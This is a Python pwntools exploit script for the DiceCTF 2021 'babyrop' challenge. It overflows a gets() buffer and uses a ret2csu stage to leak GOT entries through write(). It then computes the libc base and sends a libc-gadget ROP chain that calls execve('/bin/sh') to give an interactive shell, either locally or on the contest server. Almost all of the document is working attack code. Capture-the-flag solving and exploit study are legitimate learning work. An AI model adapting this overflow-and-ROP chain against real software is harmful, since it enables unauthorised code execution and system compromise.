dicegang 2021 — babyrop solve script (pwntools): two ret2csu leaks of GOT entries, then a libc execve("/bin/sh") chain
#!/usr/bin/env python3.8
import os, sys
from pwn import *
# pwntools target description: 64-bit little-endian Linux; `terminal` is
# the command attach() uses to open the gdb pane (tmux split, 75% height).
context.update(arch="amd64", endian="little", os="linux")
context.terminal = ["tmux", "split-window", "-v", "-p 75"]

# True while driving a local ./babyrop process; __main__ flips it to False
# when a command-line argument selects the remote service.
LOCAL = True

# Absolute path of the challenge binary (symlinks resolved) and its parsed
# ELF.  `elf` is not referenced by the code in this script; it is handy for
# interactive inspection (elf.got, elf.symbols) when adapting the addresses.
TARGET_ELF = os.path.realpath("./babyrop")
elf = ELF(TARGET_ELF)
def attach(r):
    """Hook gdb onto the local process `r`; a no-op when LOCAL is False.

    A single breakpoint is placed on 0x4011b0 — the `call_r15_rbx` gadget
    address that read() builds its leak stage around — so the ret2csu call
    into write() can be inspected, after which the debugger continues.
    """
    if not LOCAL:
        return
    breakpoints = [0x4011b0]
    script = [f"break *{bp:#x}" for bp in breakpoints]
    script.append("continue")
    gdb.attach(r, "\n".join(script))
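def read(addr, length, write_got=0x404018):
    """Return a ROP stage that makes the target call write(1, addr, length).

    This is the classic ret2csu layout built from two gadgets of the target
    binary (addresses are specific to ./babyrop — re-check them against
    __libc_csu_init if the binary changes):

      * 0x4011ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
      * 0x4011b0: mov rdx, r14; mov rsi, r13; mov edi, r12d; call [r15+rbx*8]
                  then add rbx,1; cmp rbp,rbx; jne ...; add rsp,8; 6 pops; ret

    With rbx=0, rbp=1 the call goes through [write_got] exactly once and the
    loop falls through; the 7 trailing junk qwords feed the `add rsp,8` and
    the six pops, so whatever follows this stage on the stack is the next
    return target.  The GOT slot is dereferenced at call time, so the stage
    works whether or not write@got is already resolved.

    Args:
        addr: address of the bytes to leak (ends up in rsi).
        length: number of bytes to write (ends up in rdx).
        write_got: address of write's GOT slot; defaults to ./babyrop's
            0x404018 so existing callers keep working.

    Returns:
        bytes, always 120 bytes long, to be placed right after the saved
        return address.
    """
    pop_rbx_rbp_r12_r13_r14_r15 = 0x4011ca
    call_r15_rbx = 0x4011b0

    def q(value):
        # Same encoding as pwntools' p64 under the amd64/little-endian
        # context; using int.to_bytes keeps this helper free of pwntools so
        # the chain layout can be unit-tested on its own.
        return value.to_bytes(8, "little")

    return b"".join([
        q(pop_rbx_rbp_r12_r13_r14_r15),
        q(0),              # rbx: index into the pointer table at r15
        q(1),              # rbp: equals rbx+1 after the call -> no loop
        q(1),              # r12 -> edi: fd 1 (stdout)
        q(addr),           # r13 -> rsi: buffer to leak
        q(length),         # r14 -> rdx: byte count
        q(write_got),      # r15: &write@got, so call [r15] is write()
        q(call_r15_rbx),
        b"JUNKJUNK" * 7,   # consumed by add rsp,8 + pop rbx..r15
    ])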
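# Bytes from the start of the "name" buffer up to the saved return address.
_PAD = b"A" * 72


def _send_stage(r, chain):
    """Answer the "Your name: " prompt with one overflow payload.

    The binary imports gets() (its GOT slot is leaked below), presumably for
    this prompt; gets() stops at the first '\\n', so a gadget or data qword
    containing 0x0a would silently truncate the chain.  Refuse to send such a
    payload instead of failing mysteriously later.
    """
    if b"\n" in chain:
        error("payload contains a newline byte; gets() would truncate the chain")
    r.sendlineafter(b"Your name: ", chain)


def _leak_qword(r, where, ret_to):
    """Overflow once, leak the 8 bytes at `where` via write(), return to `ret_to`.

    Returns the leaked value as an int.
    """
    _send_stage(r, flat(_PAD, read(where, 8), p64(ret_to)))
    # recv(8) returns *up to* 8 bytes and u64() needs exactly 8; recvn blocks
    # until the whole qword has arrived (matters over a real network).
    return u64(r.recvn(8))


def _execve_binsh_chain(libc_base):
    """Build the final stage: execve("//bin/sh", argv, envp) via a raw syscall.

    Generated with `ropper --chain="execve cmd=/bin/sh"`.  All offsets belong
    to one specific libc build (the one whose gets() sits at 0x086af0); they
    are meaningless for any other build.  "//bin/sh" is stored at
    libc+0x1eb1a0 and a zero qword at libc+0x1eb1a8, which doubles as the
    string terminator and as the empty argv/envp array; rax=0x3b is
    SYS_execve on x86-64, so the chain never returns on success.
    """
    def at(off):
        return p64(libc_base + off)

    junk = p64(0xdeadbeefdeadbeef)
    # mov qword [rbx], r13; pop rbx; pop rbp; pop r12; pop r13; ret
    store = [at(0x064075), junk, junk, junk, junk]
    return flat(
        at(0x02911d), b"//bin/sh",         # pop r13; ret
        at(0x0331ff), at(0x1eb1a0),        # pop rbx; ret
        *store,                            # [libc+0x1eb1a0] = "//bin/sh"
        at(0x02911d), p64(0),              # pop r13; ret
        at(0x0331ff), at(0x1eb1a8),        # pop rbx; ret
        *store,                            # [libc+0x1eb1a8] = 0
        at(0x026b72), at(0x1eb1a0),        # pop rdi; ret        -> pathname
        at(0x027529), at(0x1eb1a8),        # pop rsi; ret        -> argv (NULL)
        at(0x11c371), at(0x1eb1a8), junk,  # pop rdx; pop r12; ret -> envp (NULL)
        at(0x04a550), p64(0x3b),           # pop rax; ret        -> SYS_execve
        at(0x066229),                      # syscall; ret
    )


def exploit(r):
    """Run the three-stage attack over tube `r` and hand the shell to the user.

    Stages 1-2 overflow the name buffer and use read() (ret2csu into write())
    to leak write@got and gets@got, returning to 0x401136 after each leak to
    get another overflow.  Stage 3 derives the libc base from the gets leak
    and sends an execve("/bin/sh") chain made entirely of libc gadgets.
    """
    attach(r)
    write_got = 0x404018
    gets_got = 0x404020
    # Address re-entered after each leak to get a fresh prompt; presumably
    # main() or the prompt loop — TODO confirm against the binary.
    ret_to_main = 0x401136

    write_addr = _leak_qword(r, write_got, ret_to_main)
    success("write: " + hex(write_addr))
    gets_addr = _leak_qword(r, gets_got, ret_to_main)
    success("gets: " + hex(gets_addr))

    gets_offset = 0x086af0
    libc_base = gets_addr - gets_offset
    # libc is mapped page-aligned, so a leak from the expected build leaves
    # the low 12 bits of the base at zero.  A different libc almost always
    # fails this check; bail out rather than jump to garbage offsets.
    if libc_base & 0xfff:
        error("gets leak %#x does not match expected offset %#x (wrong libc?)"
              % (gets_addr, gets_offset))
    success("libc:" + hex(libc_base))
    # The earlier system/"/bin/sh" offsets were computed but never used:
    # the final stage is a raw execve syscall, not a call to system().

    _send_stage(r, flat(_PAD, _execve_binsh_chain(libc_base)))
    r.interactive()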
if __name__ == "__main__":
    # Any command-line argument selects the remote instance; with none the
    # binary is spawned locally (and attach() can hook gdb onto it).
    LOCAL = len(sys.argv) < 2
    if LOCAL:
        # To reproduce the remote libc offsets locally you would pass
        # env={"LD_PRELOAD": <libc path>} here; note that the original hint
        # referenced a `libc` object this script never defines.
        r = process([TARGET_ELF])
    else:
        r = remote("dicec.tf", 31924)
    exploit(r)
    sys.exit(0)